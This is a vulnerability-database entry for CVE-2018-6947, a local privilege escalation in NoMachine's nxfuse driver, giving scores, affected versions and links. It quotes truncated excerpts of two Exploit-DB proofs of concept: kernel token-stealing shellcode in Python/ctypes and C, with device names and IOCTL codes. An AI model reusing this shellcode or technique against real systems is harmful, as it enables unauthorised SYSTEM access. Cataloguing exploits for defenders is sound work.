CVE-2018-6947
published 2018-02-28CVE-2018-6947: An uninitialised stack variable in the nxfuse component that is part of the Open Source DokanFS library shipped with NoMachine 6.0.66_2 and earlier allows a…
PriorityP344high7.8CVSS 3.0
AVLACLPRLUINSUCHIHAH
EXPLOIT
EPSS
3.21%
86.6th percentile
An uninitialised stack variable in the nxfuse component that is part of the Open Source DokanFS library shipped with NoMachine 6.0.66_2 and earlier allows a local low privileged user to gain elevation of privileges on Windows 7 (32 and 64bit), and denial of service for Windows 8 and 10.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nomachine | nomachine | <= 6.0.66_2 | — |
CVSS provenance
nvdv3.07.8HIGHCVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
NoMachine < 6.0.80 (x64) - 'nxfuse' Privilege Escalation
exploitdb·2018-02-22
CVE-2018-6947 NoMachine < 6.0.80 (x64) - 'nxfuse' Privilege Escalation
NoMachine < 6.0.80 (x64) - 'nxfuse' Privilege Escalation
---
from ctypes import *
from ctypes.wintypes import *
import struct
import sys
import os
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
STATUS_INVALID_HANDLE = 0xC0000008
shellcode_len = 90
s = “”
s += “\x65\x48\x8B\x04\x25\x88\x01\x00” #mov rax, [gs:0x188]
s += “\x00”
s += “\x48\x8B\x40\x70” #mov rax, [rax + 0x70]
s += “\x48\x8B\x98\x90\x02\x00\x00” #mov rbx, [rax + 0x290]
s += “\x48\x8B\x80\x88\x01\x00\x00” #mov rax, [rax + 0x188]
s += “\x48\x2D\x88\x01\x00\x00” #sub rax, 0x188
s += “\x48\x39\x98\x80\x01\x00\x00” #cmp [rax + 0x180], rbx
s += “\x75\xEA” #jne Loop1
s += “\x48\x89\xC1” #mov rcx, rax
Exploit-DB
NoMachine < 6.0.80 (x86) - 'nxfuse' Privilege Escalation
exploitdb·2018-02-22
CVE-2018-6947 NoMachine < 6.0.80 (x86) - 'nxfuse' Privilege Escalation
NoMachine
#define DEVICE L”\\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061″
#define DEVICE2 L”\\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}”
#define IOCTL 0x00222014
#define IOCTL2 0x00222030
#define OUT_SIZE 0x90
#define IN_SIZE 0x10
#define KTHREAD_OFFSET 0x124
#define EPROCESS_OFFSET 0x050
#define PID_OFFSET 0x0b4
#define FLINK_OFFSET 0x0b8
#define TOKEN_OFFSET 0x0f8
#define SYSTEM_PID 0x004
#define PARENT_PID 0x140
__declspec(naked)VOID TokenStealingShellcode()
{
__asm{
xor eax, eax;
mov eax, fs:[eax + KTHREAD_OFFSET];
mov eax, [eax + EPROCESS_OFFSET];
mov esi, [eax + PARENT_PID]; Get parent pid
Loop1:
mov eax, [eax + FLINK_OFFSET];
sub eax, FLINK_OFFSET;
cmp esi, [eax + PID_OFFSET];
jne Loop1;
mov ecx, eax;
No writeups or analysis indexed.
https://www.exploit-db.com/exploits/44167/https://www.exploit-db.com/exploits/44168/https://www.fidusinfosec.com/nomachine-road-code-execution-without-fuzzing-cve-2018-6947/https://www.nomachine.com/SU02P00194https://www.nomachine.com/SU02P00195https://www.nomachine.com/TR02P08408https://www.exploit-db.com/exploits/44167/https://www.exploit-db.com/exploits/44168/https://www.fidusinfosec.com/nomachine-road-code-execution-without-fuzzing-cve-2018-6947/https://www.nomachine.com/SU02P00194https://www.nomachine.com/SU02P00195https://www.nomachine.com/TR02P08408
2018-02-28
Published